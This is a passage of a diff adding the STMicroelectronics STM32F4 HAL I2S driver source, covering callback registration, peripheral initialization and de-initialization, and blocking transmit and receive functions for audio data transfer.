HAL_I2S_Init() and when the state is HAL_I2S_STATE_RESET + all callbacks are set to the corresponding weak functions: + examples HAL_I2S_MasterTxCpltCallback(), HAL_I2S_MasterRxCpltCallback(). + Exception done for MspInit and MspDeInit functions that are + reset to the legacy weak functions in the HAL_I2S_Init()/ HAL_I2S_DeInit() only when + these callbacks are null (not registered beforehand). + If MspInit or MspDeInit are not null, the HAL_I2S_Init()/ HAL_I2S_DeInit() + keep and use the user MspInit/MspDeInit callbacks (registered beforehand) whatever the state. + + [..] + Callbacks can be registered/unregistered in HAL_I2S_STATE_READY state only. + Exception done MspInit/MspDeInit functions that can be registered/unregistered + in HAL_I2S_STATE_READY or HAL_I2S_STATE_RESET state, + thus registered (user) MspInit/DeInit callbacks can be used during the Init/DeInit. + Then, the user first registers the MspInit/MspDeInit user callbacks + using HAL_I2S_RegisterCallback() before calling HAL_I2S_DeInit() + or HAL_I2S_Init() function. + + [..] + When the compilation define USE_HAL_I2S_REGISTER_CALLBACKS is set to 0 or + not defined, the callback registering feature is not available + and weak (surcharged) callbacks are used. + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +#ifdef HAL_I2S_MODULE_ENABLED + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup I2S I2S + * @brief I2S HAL module driver + * @{ + */ + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +#define I2S_TIMEOUT_FLAG 100U /*!< Timeout 100 ms */ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/** @defgroup I2S_Private_Functions I2S Private Functions + * @{ + */ +static void I2S_DMATxCplt(DMA_HandleTypeDef *hdma); +static void I2S_DMATxHalfCplt(DMA_HandleTypeDef *hdma); +static void I2S_DMARxCplt(DMA_HandleTypeDef *hdma); +static void I2S_DMARxHalfCplt(DMA_HandleTypeDef *hdma); +static void I2S_DMAError(DMA_HandleTypeDef *hdma); +static void I2S_Transmit_IT(I2S_HandleTypeDef *hi2s); +static void I2S_Receive_IT(I2S_HandleTypeDef *hi2s); +static void I2S_IRQHandler(I2S_HandleTypeDef *hi2s); +static HAL_StatusTypeDef I2S_WaitFlagStateUntilTimeout(I2S_HandleTypeDef *hi2s, uint32_t Flag, FlagStatus State, + uint32_t Timeout); +/** + * @} + */ + +/* Exported functions ---------------------------------------------------------*/ + +/** @defgroup I2S_Exported_Functions I2S Exported Functions + * @{ + */ + +/** @defgroup I2S_Exported_Functions_Group1 Initialization and de-initialization functions + * @brief Initialization and Configuration functions + * +@verbatim + =============================================================================== + ##### Initialization and de-initialization functions ##### + =============================================================================== + [..] This subsection provides a set of functions allowing to initialize and + de-initialize the I2Sx peripheral in simplex mode: + + (+) User must Implement HAL_I2S_MspInit() function in which he configures + all related peripherals resources (CLOCK, GPIO, DMA, IT and NVIC ). + + (+) Call the function HAL_I2S_Init() to configure the selected device with + the selected configuration: + (++) Mode + (++) Standard + (++) Data Format + (++) MCLK Output + (++) Audio frequency + (++) Polarity + (++) Full duplex mode + + (+) Call the function HAL_I2S_DeInit() to restore the default configuration + of the selected I2Sx peripheral. + @endverbatim + * @{ + */ + +/** + * @brief Initializes the I2S according to the specified parameters + * in the I2S_InitTypeDef and create the associated handle. + * @param hi2s pointer to a I2S_HandleTypeDef structure that contains + * the configuration information for I2S module + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2S_Init(I2S_HandleTypeDef *hi2s) +{ + uint32_t i2sdiv; + uint32_t i2sodd; + uint32_t packetlength; + uint32_t tmp; + uint32_t i2sclk; +#if defined (SPI_I2S_FULLDUPLEX_SUPPORT) + uint16_t tmpreg; +#endif + + /* Check the I2S handle allocation */ + if (hi2s == NULL) + { + return HAL_ERROR; + } + + /* Check the I2S parameters */ + assert_param(IS_I2S_ALL_INSTANCE(hi2s->Instance)); + assert_param(IS_I2S_MODE(hi2s->Init.Mode)); + assert_param(IS_I2S_STANDARD(hi2s->Init.Standard)); + assert_param(IS_I2S_DATA_FORMAT(hi2s->Init.DataFormat)); + assert_param(IS_I2S_MCLK_OUTPUT(hi2s->Init.MCLKOutput)); + assert_param(IS_I2S_AUDIO_FREQ(hi2s->Init.AudioFreq)); + assert_param(IS_I2S_CPOL(hi2s->Init.CPOL)); + assert_param(IS_I2S_CLOCKSOURCE(hi2s->Init.ClockSource)); + + if (hi2s->State == HAL_I2S_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hi2s->Lock = HAL_UNLOCKED; + + /* Initialize Default I2S IrqHandler ISR */ + hi2s->IrqHandlerISR = I2S_IRQHandler; + +#if (USE_HAL_I2S_REGISTER_CALLBACKS == 1U) + /* Init the I2S Callback settings */ + hi2s->TxCpltCallback = HAL_I2S_TxCpltCallback; /* Legacy weak TxCpltCallback */ + hi2s->RxCpltCallback = HAL_I2S_RxCpltCallback; /* Legacy weak RxCpltCallback */ +#if defined (SPI_I2S_FULLDUPLEX_SUPPORT) + hi2s->TxRxCpltCallback = HAL_I2SEx_TxRxCpltCallback; /* Legacy weak TxRxCpltCallback */ +#endif /* SPI_I2S_FULLDUPLEX_SUPPORT */ + hi2s->TxHalfCpltCallback = HAL_I2S_TxHalfCpltCallback; /* Legacy weak TxHalfCpltCallback */ + hi2s->RxHalfCpltCallback = HAL_I2S_RxHalfCpltCallback; /* Legacy weak RxHalfCpltCallback */ +#if defined (SPI_I2S_FULLDUPLEX_SUPPORT) + hi2s->TxRxHalfCpltCallback = HAL_I2SEx_TxRxHalfCpltCallback; /* Legacy weak TxRxHalfCpltCallback */ +#endif /* SPI_I2S_FULLDUPLEX_SUPPORT */ + hi2s->ErrorCallback = HAL_I2S_ErrorCallback; /* Legacy weak ErrorCallback */ + + if (hi2s->MspInitCallback == NULL) + { + hi2s->MspInitCallback = HAL_I2S_MspInit; /* Legacy weak MspInit */ + } + + /* Init the low level hardware : GPIO, CLOCK, NVIC... */ + hi2s->MspInitCallback(hi2s); +#else + /* Init the low level hardware : GPIO, CLOCK, CORTEX...etc */ + HAL_I2S_MspInit(hi2s); +#endif /* USE_HAL_I2S_REGISTER_CALLBACKS */ + } + + hi2s->State = HAL_I2S_STATE_BUSY; + + /*----------------------- SPIx I2SCFGR & I2SPR Configuration ----------------*/ + /* Clear I2SMOD, I2SE, I2SCFG, PCMSYNC, I2SSTD, CKPOL, DATLEN and CHLEN bits */ + CLEAR_BIT(hi2s->Instance->I2SCFGR, (SPI_I2SCFGR_CHLEN | SPI_I2SCFGR_DATLEN | SPI_I2SCFGR_CKPOL | \ + SPI_I2SCFGR_I2SSTD | SPI_I2SCFGR_PCMSYNC | SPI_I2SCFGR_I2SCFG | \ + SPI_I2SCFGR_I2SE | SPI_I2SCFGR_I2SMOD)); + hi2s->Instance->I2SPR = 0x0002U; + + /*----------------------- I2SPR: I2SDIV and ODD Calculation -----------------*/ + /* If the requested audio frequency is not the default, compute the prescaler */ + if (hi2s->Init.AudioFreq != I2S_AUDIOFREQ_DEFAULT) + { + /* Check the frame length (For the Prescaler computing) ********************/ + if (hi2s->Init.DataFormat == I2S_DATAFORMAT_16B) + { + /* Packet length is 16 bits */ + packetlength = 16U; + } + else + { + /* Packet length is 32 bits */ + packetlength = 32U; + } + + /* I2S standard */ + if (hi2s->Init.Standard <= I2S_STANDARD_LSB) + { + /* In I2S standard packet length is multiplied by 2 */ + packetlength = packetlength * 2U; + } + + /* Get the source clock value **********************************************/ +#if defined(I2S_APB1_APB2_FEATURE) + if (IS_I2S_APB1_INSTANCE(hi2s->Instance)) + { + i2sclk = HAL_RCCEx_GetPeriphCLKFreq(RCC_PERIPHCLK_I2S_APB1); + } + else + { + i2sclk = HAL_RCCEx_GetPeriphCLKFreq(RCC_PERIPHCLK_I2S_APB2); + } +#else + i2sclk = HAL_RCCEx_GetPeriphCLKFreq(RCC_PERIPHCLK_I2S); +#endif /* I2S_APB1_APB2_FEATURE */ + + /* Compute the Real divider depending on the MCLK output state, with a floating point */ + if (hi2s->Init.MCLKOutput == I2S_MCLKOUTPUT_ENABLE) + { + /* MCLK output is enabled */ + if (hi2s->Init.DataFormat != I2S_DATAFORMAT_16B) + { + tmp = (uint32_t)(((((i2sclk / (packetlength * 4U)) * 10U) / hi2s->Init.AudioFreq)) + 5U); + } + else + { + tmp = (uint32_t)(((((i2sclk / (packetlength * 8U)) * 10U) / hi2s->Init.AudioFreq)) + 5U); + } + } + else + { + /* MCLK output is disabled */ + tmp = (uint32_t)(((((i2sclk / packetlength) * 10U) / hi2s->Init.AudioFreq)) + 5U); + } + + /* Remove the flatting point */ + tmp = tmp / 10U; + + /* Check the parity of the divider */ + i2sodd = (uint32_t)(tmp & (uint32_t)1U); + + /* Compute the i2sdiv prescaler */ + i2sdiv = (uint32_t)((tmp - i2sodd) / 2U); + + /* Get the Mask for the Odd bit (SPI_I2SPR[8]) register */ + i2sodd = (uint32_t)(i2sodd << 8U); + } + else + { + /* Set the default values */ + i2sdiv = 2U; + i2sodd = 0U; + } + + /* Test if the divider is 1 or 0 or greater than 0xFF */ + if ((i2sdiv < 2U) || (i2sdiv > 0xFFU)) + { + /* Set the error code and execute error callback*/ + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_PRESCALER); + return HAL_ERROR; + } + + /*----------------------- SPIx I2SCFGR & I2SPR Configuration ----------------*/ + + /* Write to SPIx I2SPR register the computed value */ + hi2s->Instance->I2SPR = (uint32_t)((uint32_t)i2sdiv | (uint32_t)(i2sodd | (uint32_t)hi2s->Init.MCLKOutput)); + + /* Clear I2SMOD, I2SE, I2SCFG, PCMSYNC, I2SSTD, CKPOL, DATLEN and CHLEN bits */ + /* And configure the I2S with the I2S_InitStruct values */ + MODIFY_REG(hi2s->Instance->I2SCFGR, (SPI_I2SCFGR_CHLEN | SPI_I2SCFGR_DATLEN | \ + SPI_I2SCFGR_CKPOL | SPI_I2SCFGR_I2SSTD | \ + SPI_I2SCFGR_PCMSYNC | SPI_I2SCFGR_I2SCFG | \ + SPI_I2SCFGR_I2SE | SPI_I2SCFGR_I2SMOD), \ + (SPI_I2SCFGR_I2SMOD | hi2s->Init.Mode | \ + hi2s->Init.Standard | hi2s->Init.DataFormat | \ + hi2s->Init.CPOL)); + +#if defined(SPI_I2SCFGR_ASTRTEN) + if ((hi2s->Init.Standard == I2S_STANDARD_PCM_SHORT) || ((hi2s->Init.Standard == I2S_STANDARD_PCM_LONG))) + { + /* Write to SPIx I2SCFGR */ + SET_BIT(hi2s->Instance->I2SCFGR, SPI_I2SCFGR_ASTRTEN); + } +#endif /* SPI_I2SCFGR_ASTRTEN */ + +#if defined (SPI_I2S_FULLDUPLEX_SUPPORT) + + /* Configure the I2S extended if the full duplex mode is enabled */ + assert_param(IS_I2S_FULLDUPLEX_MODE(hi2s->Init.FullDuplexMode)); + + if (hi2s->Init.FullDuplexMode == I2S_FULLDUPLEXMODE_ENABLE) + { + /* Set FullDuplex I2S IrqHandler ISR if FULLDUPLEXMODE is enabled */ + hi2s->IrqHandlerISR = HAL_I2SEx_FullDuplex_IRQHandler; + + /* Clear I2SMOD, I2SE, I2SCFG, PCMSYNC, I2SSTD, CKPOL, DATLEN and CHLEN bits */ + CLEAR_BIT(I2SxEXT(hi2s->Instance)->I2SCFGR, (SPI_I2SCFGR_CHLEN | SPI_I2SCFGR_DATLEN | SPI_I2SCFGR_CKPOL | \ + SPI_I2SCFGR_I2SSTD | SPI_I2SCFGR_PCMSYNC | SPI_I2SCFGR_I2SCFG | \ + SPI_I2SCFGR_I2SE | SPI_I2SCFGR_I2SMOD)); + I2SxEXT(hi2s->Instance)->I2SPR = 2U; + + /* Get the I2SCFGR register value */ + tmpreg = I2SxEXT(hi2s->Instance)->I2SCFGR; + + /* Get the mode to be configured for the extended I2S */ + if ((hi2s->Init.Mode == I2S_MODE_MASTER_TX) || (hi2s->Init.Mode == I2S_MODE_SLAVE_TX)) + { + tmp = I2S_MODE_SLAVE_RX; + } + else /* I2S_MODE_MASTER_RX || I2S_MODE_SLAVE_RX */ + { + tmp = I2S_MODE_SLAVE_TX; + } + + /* Configure the I2S Slave with the I2S Master parameter values */ + tmpreg |= (uint16_t)((uint16_t)SPI_I2SCFGR_I2SMOD | \ + (uint16_t)tmp | \ + (uint16_t)hi2s->Init.Standard | \ + (uint16_t)hi2s->Init.DataFormat | \ + (uint16_t)hi2s->Init.CPOL); + + /* Write to SPIx I2SCFGR */ + WRITE_REG(I2SxEXT(hi2s->Instance)->I2SCFGR, tmpreg); + } +#endif /* SPI_I2S_FULLDUPLEX_SUPPORT */ + + hi2s->ErrorCode = HAL_I2S_ERROR_NONE; + hi2s->State = HAL_I2S_STATE_READY; + + return HAL_OK; +} + +/** + * @brief DeInitializes the I2S peripheral + * @param hi2s pointer to a I2S_HandleTypeDef structure that contains + * the configuration information for I2S module + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2S_DeInit(I2S_HandleTypeDef *hi2s) +{ + /* Check the I2S handle allocation */ + if (hi2s == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_I2S_ALL_INSTANCE(hi2s->Instance)); + + hi2s->State = HAL_I2S_STATE_BUSY; + + /* Disable the I2S Peripheral Clock */ + __HAL_I2S_DISABLE(hi2s); + +#if (USE_HAL_I2S_REGISTER_CALLBACKS == 1U) + if (hi2s->MspDeInitCallback == NULL) + { + hi2s->MspDeInitCallback = HAL_I2S_MspDeInit; /* Legacy weak MspDeInit */ + } + + /* DeInit the low level hardware: GPIO, CLOCK, NVIC... */ + hi2s->MspDeInitCallback(hi2s); +#else + /* DeInit the low level hardware: GPIO, CLOCK, NVIC... */ + HAL_I2S_MspDeInit(hi2s); +#endif /* USE_HAL_I2S_REGISTER_CALLBACKS */ + + hi2s->ErrorCode = HAL_I2S_ERROR_NONE; + hi2s->State = HAL_I2S_STATE_RESET; + + /* Release Lock */ + __HAL_UNLOCK(hi2s); + + return HAL_OK; +} + +/** + * @brief I2S MSP Init + * @param hi2s pointer to a I2S_HandleTypeDef structure that contains + * the configuration information for I2S module + * @retval None + */ +__weak void HAL_I2S_MspInit(I2S_HandleTypeDef *hi2s) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hi2s); + + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_I2S_MspInit could be implemented in the user file + */ +} + +/** + * @brief I2S MSP DeInit + * @param hi2s pointer to a I2S_HandleTypeDef structure that contains + * the configuration information for I2S module + * @retval None + */ +__weak void HAL_I2S_MspDeInit(I2S_HandleTypeDef *hi2s) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hi2s); + + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_I2S_MspDeInit could be implemented in the user file + */ +} + +#if (USE_HAL_I2S_REGISTER_CALLBACKS == 1U) +/** + * @brief Register a User I2S Callback + * To be used instead of the weak predefined callback + * @param hi2s Pointer to a I2S_HandleTypeDef structure that contains + * the configuration information for the specified I2S. + * @param CallbackID ID of the callback to be registered + * @param pCallback pointer to the Callback function + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2S_RegisterCallback(I2S_HandleTypeDef *hi2s, HAL_I2S_CallbackIDTypeDef CallbackID, + pI2S_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + /* Update the error code */ + hi2s->ErrorCode |= HAL_I2S_ERROR_INVALID_CALLBACK; + + return HAL_ERROR; + } + /* Process locked */ + __HAL_LOCK(hi2s); + + if (HAL_I2S_STATE_READY == hi2s->State) + { + switch (CallbackID) + { + case HAL_I2S_TX_COMPLETE_CB_ID : + hi2s->TxCpltCallback = pCallback; + break; + + case HAL_I2S_RX_COMPLETE_CB_ID : + hi2s->RxCpltCallback = pCallback; + break; + +#if defined (SPI_I2S_FULLDUPLEX_SUPPORT) + case HAL_I2S_TX_RX_COMPLETE_CB_ID : + hi2s->TxRxCpltCallback = pCallback; + break; +#endif /* SPI_I2S_FULLDUPLEX_SUPPORT */ + + case HAL_I2S_TX_HALF_COMPLETE_CB_ID : + hi2s->TxHalfCpltCallback = pCallback; + break; + + case HAL_I2S_RX_HALF_COMPLETE_CB_ID : + hi2s->RxHalfCpltCallback = pCallback; + break; + +#if defined (SPI_I2S_FULLDUPLEX_SUPPORT) + case HAL_I2S_TX_RX_HALF_COMPLETE_CB_ID : + hi2s->TxRxHalfCpltCallback = pCallback; + break; +#endif /* SPI_I2S_FULLDUPLEX_SUPPORT */ + + case HAL_I2S_ERROR_CB_ID : + hi2s->ErrorCallback = pCallback; + break; + + case HAL_I2S_MSPINIT_CB_ID : + hi2s->MspInitCallback = pCallback; + break; + + case HAL_I2S_MSPDEINIT_CB_ID : + hi2s->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_INVALID_CALLBACK); + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (HAL_I2S_STATE_RESET == hi2s->State) + { + switch (CallbackID) + { + case HAL_I2S_MSPINIT_CB_ID : + hi2s->MspInitCallback = pCallback; + break; + + case HAL_I2S_MSPDEINIT_CB_ID : + hi2s->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_INVALID_CALLBACK); + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_INVALID_CALLBACK); + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hi2s); + return status; +} + +/** + * @brief Unregister an I2S Callback + * I2S callback is redirected to the weak predefined callback + * @param hi2s Pointer to a I2S_HandleTypeDef structure that contains + * the configuration information for the specified I2S. + * @param CallbackID ID of the callback to be unregistered + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2S_UnRegisterCallback(I2S_HandleTypeDef *hi2s, HAL_I2S_CallbackIDTypeDef CallbackID) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hi2s); + + if (HAL_I2S_STATE_READY == hi2s->State) + { + switch (CallbackID) + { + case HAL_I2S_TX_COMPLETE_CB_ID : + hi2s->TxCpltCallback = HAL_I2S_TxCpltCallback; /* Legacy weak TxCpltCallback */ + break; + + case HAL_I2S_RX_COMPLETE_CB_ID : + hi2s->RxCpltCallback = HAL_I2S_RxCpltCallback; /* Legacy weak RxCpltCallback */ + break; + +#if defined (SPI_I2S_FULLDUPLEX_SUPPORT) + case HAL_I2S_TX_RX_COMPLETE_CB_ID : + hi2s->TxRxCpltCallback = HAL_I2SEx_TxRxCpltCallback; /* Legacy weak TxRxCpltCallback */ + break; +#endif /* SPI_I2S_FULLDUPLEX_SUPPORT */ + + case HAL_I2S_TX_HALF_COMPLETE_CB_ID : + hi2s->TxHalfCpltCallback = HAL_I2S_TxHalfCpltCallback; /* Legacy weak TxHalfCpltCallback */ + break; + + case HAL_I2S_RX_HALF_COMPLETE_CB_ID : + hi2s->RxHalfCpltCallback = HAL_I2S_RxHalfCpltCallback; /* Legacy weak RxHalfCpltCallback */ + break; + +#if defined (SPI_I2S_FULLDUPLEX_SUPPORT) + case HAL_I2S_TX_RX_HALF_COMPLETE_CB_ID : + hi2s->TxRxHalfCpltCallback = HAL_I2SEx_TxRxHalfCpltCallback; /* Legacy weak TxRxHalfCpltCallback */ + break; +#endif /* SPI_I2S_FULLDUPLEX_SUPPORT */ + + case HAL_I2S_ERROR_CB_ID : + hi2s->ErrorCallback = HAL_I2S_ErrorCallback; /* Legacy weak ErrorCallback */ + break; + + case HAL_I2S_MSPINIT_CB_ID : + hi2s->MspInitCallback = HAL_I2S_MspInit; /* Legacy weak MspInit */ + break; + + case HAL_I2S_MSPDEINIT_CB_ID : + hi2s->MspDeInitCallback = HAL_I2S_MspDeInit; /* Legacy weak MspDeInit */ + break; + + default : + /* Update the error code */ + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_INVALID_CALLBACK); + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (HAL_I2S_STATE_RESET == hi2s->State) + { + switch (CallbackID) + { + case HAL_I2S_MSPINIT_CB_ID : + hi2s->MspInitCallback = HAL_I2S_MspInit; /* Legacy weak MspInit */ + break; + + case HAL_I2S_MSPDEINIT_CB_ID : + hi2s->MspDeInitCallback = HAL_I2S_MspDeInit; /* Legacy weak MspDeInit */ + break; + + default : + /* Update the error code */ + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_INVALID_CALLBACK); + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_INVALID_CALLBACK); + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hi2s); + return status; +} +#endif /* USE_HAL_I2S_REGISTER_CALLBACKS */ +/** + * @} + */ + +/** @defgroup I2S_Exported_Functions_Group2 IO operation functions + * @brief Data transfers functions + * +@verbatim + =============================================================================== + ##### IO operation functions ##### + =============================================================================== + [..] + This subsection provides a set of functions allowing to manage the I2S data + transfers. + + (#) There are two modes of transfer: + (++) Blocking mode : The communication is performed in the polling mode. + The status of all data processing is returned by the same function + after finishing transfer. + (++) No-Blocking mode : The communication is performed using Interrupts + or DMA. These functions return the status of the transfer startup. + The end of the data processing will be indicated through the + dedicated I2S IRQ when using Interrupt mode or the DMA IRQ when + using DMA mode. + + (#) Blocking mode functions are : + (++) HAL_I2S_Transmit() + (++) HAL_I2S_Receive() + + (#) No-Blocking mode functions with Interrupt are : + (++) HAL_I2S_Transmit_IT() + (++) HAL_I2S_Receive_IT() + + (#) No-Blocking mode functions with DMA are : + (++) HAL_I2S_Transmit_DMA() + (++) HAL_I2S_Receive_DMA() + + (#) A set of Transfer Complete Callbacks are provided in non Blocking mode: + (++) HAL_I2S_TxCpltCallback() + (++) HAL_I2S_RxCpltCallback() + (++) HAL_I2S_ErrorCallback() + +@endverbatim + * @{ + */ + +/** + * @brief Transmit an amount of data in blocking mode + * @param hi2s pointer to a I2S_HandleTypeDef structure that contains + * the configuration information for I2S module + * @param pData a 16-bit pointer to data buffer. + * @param Size number of data sample to be sent: + * @note When a 16-bit data frame or a 16-bit data frame extended is selected during the I2S + * configuration phase, the Size parameter means the number of 16-bit data length + * in the transaction and when a 24-bit data frame or a 32-bit data frame is selected + * the Size parameter means the number of 24-bit or 32-bit data length. + * @param Timeout Timeout duration + * @note The I2S is kept enabled at the end of transaction to avoid the clock de-synchronization + * between Master and Slave(example: audio streaming). + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2S_Transmit(I2S_HandleTypeDef *hi2s, uint16_t *pData, uint16_t Size, uint32_t Timeout) +{ + uint32_t tmpreg_cfgr; + + if ((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hi2s); + + if (hi2s->State != HAL_I2S_STATE_READY) + { + __HAL_UNLOCK(hi2s); + return HAL_BUSY; + } + + /* Set state and reset error code */ + hi2s->State = HAL_I2S_STATE_BUSY_TX; + hi2s->ErrorCode = HAL_I2S_ERROR_NONE; + hi2s->pTxBuffPtr = pData; + + tmpreg_cfgr = hi2s->Instance->I2SCFGR & (SPI_I2SCFGR_DATLEN | SPI_I2SCFGR_CHLEN); + + if ((tmpreg_cfgr == I2S_DATAFORMAT_24B) || (tmpreg_cfgr == I2S_DATAFORMAT_32B)) + { + hi2s->TxXferSize = (Size << 1U); + hi2s->TxXferCount = (Size << 1U); + } + else + { + hi2s->TxXferSize = Size; + hi2s->TxXferCount = Size; + } + + tmpreg_cfgr = hi2s->Instance->I2SCFGR; + + /* Check if the I2S is already enabled */ + if ((hi2s->Instance->I2SCFGR & SPI_I2SCFGR_I2SE) != SPI_I2SCFGR_I2SE) + { + /* Enable I2S peripheral */ + __HAL_I2S_ENABLE(hi2s); + } + + /* Wait until TXE flag is set */ + if (I2S_WaitFlagStateUntilTimeout(hi2s, I2S_FLAG_TXE, SET, Timeout) != HAL_OK) + { + /* Set the error code */ + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_TIMEOUT); + hi2s->State = HAL_I2S_STATE_READY; + __HAL_UNLOCK(hi2s); + return HAL_ERROR; + } + + while (hi2s->TxXferCount > 0U) + { + hi2s->Instance->DR = (*hi2s->pTxBuffPtr); + hi2s->pTxBuffPtr++; + hi2s->TxXferCount--; + + /* Wait until TXE flag is set */ + if (I2S_WaitFlagStateUntilTimeout(hi2s, I2S_FLAG_TXE, SET, Timeout) != HAL_OK) + { + /* Set the error code */ + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_TIMEOUT); + hi2s->State = HAL_I2S_STATE_READY; + __HAL_UNLOCK(hi2s); + return HAL_ERROR; + } + + /* Check if an underrun occurs */ + if (__HAL_I2S_GET_FLAG(hi2s, I2S_FLAG_UDR) == SET) + { + /* Clear underrun flag */ + __HAL_I2S_CLEAR_UDRFLAG(hi2s); + + /* Set the error code */ + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_UDR); + } + } + + /* Check if Slave mode is selected */ + if (((tmpreg_cfgr & SPI_I2SCFGR_I2SCFG) == I2S_MODE_SLAVE_TX) + || ((tmpreg_cfgr & SPI_I2SCFGR_I2SCFG) == I2S_MODE_SLAVE_RX)) + { + /* Wait until Busy flag is reset */ + if (I2S_WaitFlagStateUntilTimeout(hi2s, I2S_FLAG_BSY, RESET, Timeout) != HAL_OK) + { + /* Set the error code */ + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_TIMEOUT); + hi2s->State = HAL_I2S_STATE_READY; + __HAL_UNLOCK(hi2s); + return HAL_ERROR; + } + } + + hi2s->State = HAL_I2S_STATE_READY; + __HAL_UNLOCK(hi2s); + return HAL_OK; +} + +/** + * @brief Receive an amount of data in blocking mode + * @param hi2s pointer to a I2S_HandleTypeDef structure that contains + * the configuration information for I2S module + * @param pData a 16-bit pointer to data buffer. + * @param Size number of data sample to be sent: + * @note When a 16-bit data frame or a 16-bit data frame extended is selected during the I2S + * configuration phase, the Size parameter means the number of 16-bit data length + * in the transaction and when a 24-bit data frame or a 32-bit data frame is selected + * the Size parameter means the number of 24-bit or 32-bit data length. + * @param Timeout Timeout duration + * @note The I2S is kept enabled at the end of transaction to avoid the clock de-synchronization + * between Master and Slave(example: audio streaming). + * @note In I2S Master Receiver mode, just after enabling the peripheral the clock will be generate + * in continuous way and as the I2S is not disabled at the end of the I2S transaction. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2S_Receive(I2S_HandleTypeDef *hi2s, uint16_t *pData, uint16_t Size, uint32_t Timeout) +{ + uint32_t tmpreg_cfgr; + + if ((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hi2s); + + if (hi2s->State != HAL_I2S_STATE_READY) + { + __HAL_UNLOCK(hi2s); + return HAL_BUSY; + } + + /* Set state and reset error code */ + hi2s->State = HAL_I2S_STATE_BUSY_RX; + hi2s->ErrorCode = HAL_I2S_ERROR_NONE; + hi2s->pRxBuffPtr = pData; + + tmpreg_cfgr = hi2s->Instance->I2SCFGR & (SPI_I2SCFGR_DATLEN | SPI_I2SCFGR_CHLEN); + + if ((tmpreg_cfgr == I2S_DATAFORMAT_24B) || (tmpreg_cfgr == I2S_DATAFORMAT_32B)) + { + hi2s->RxXferSize = (Size << 1U); + hi2s->RxXferCount = (Size << 1U); + } + else + { + hi2s->RxXferSize = Size; + hi2s->RxXferCount = Size; + } + + /* Check if the I2S is already enabled */ + if ((hi2s->Instance->I2SCFGR & SPI_I2SCFGR_I2SE) != SPI_I2SCFGR_I2SE) + { + /* Enable I2S peripheral */ + __HAL_I2S_ENABLE(hi2s); + } + + /* Check if Master Receiver mode is selected */ + if ((hi2s->Instance->I2SCFGR & SPI_I2SCFGR_I2SCFG) == I2S_MODE_MASTER_RX) + { + /* Clear the Overrun Flag by a read operation on the SPI_DR register followed by a read + access to the SPI_SR register. */ + __HAL_I2S_CLEAR_OVRFLAG(hi2s); + } + + /* Receive data */ + while (hi2s->RxXferCount > 0U) + { + /* Wait until RXNE flag is set */ + if (I2S_WaitFlagStateUntilTimeout(hi2s, I2S_FLAG_RXNE, SET, Timeout) != HAL_OK) + { + /* Set the error code */ + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_TIMEOUT); + hi2s->State = HAL_I2S_STATE_READY; + __HAL_UNLOCK(hi2s); + return HAL_ERROR; + } + + (*hi2s->pRxBuffPtr) = (uint16_t)hi2s->Instance->DR; + hi2s->pRxBuffPtr++; + hi2s->RxXferCount--; + + /* Check if an overrun occurs */ + if (__HAL_I2S_GET_FLAG(hi2s, I2S_FLAG_OVR) == SET) + { + /* Clear overrun flag */ + __HAL_I2S_CLEAR_OVRFLAG(hi2s); + + /* Set the error code */ + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_OVR); + } + } + + hi2s->State = HAL_I2S_STATE_READY; + __HAL_UNLOCK(hi2s); + return HAL_OK; +} + +/** + * @brief Transmit an amount of data in non-blocking mode with Interrupt + * @param hi2s pointer to a I2S_HandleTypeDef structure that contains + * the configuration information for I2S module + * @param pData a 16-bit pointer to data buffer. + * @param Size number of data sample to be sent: + * @note When a 16-bit data frame or a 16-bit data frame extended is selected during the I2S + * configuration phase, the Size 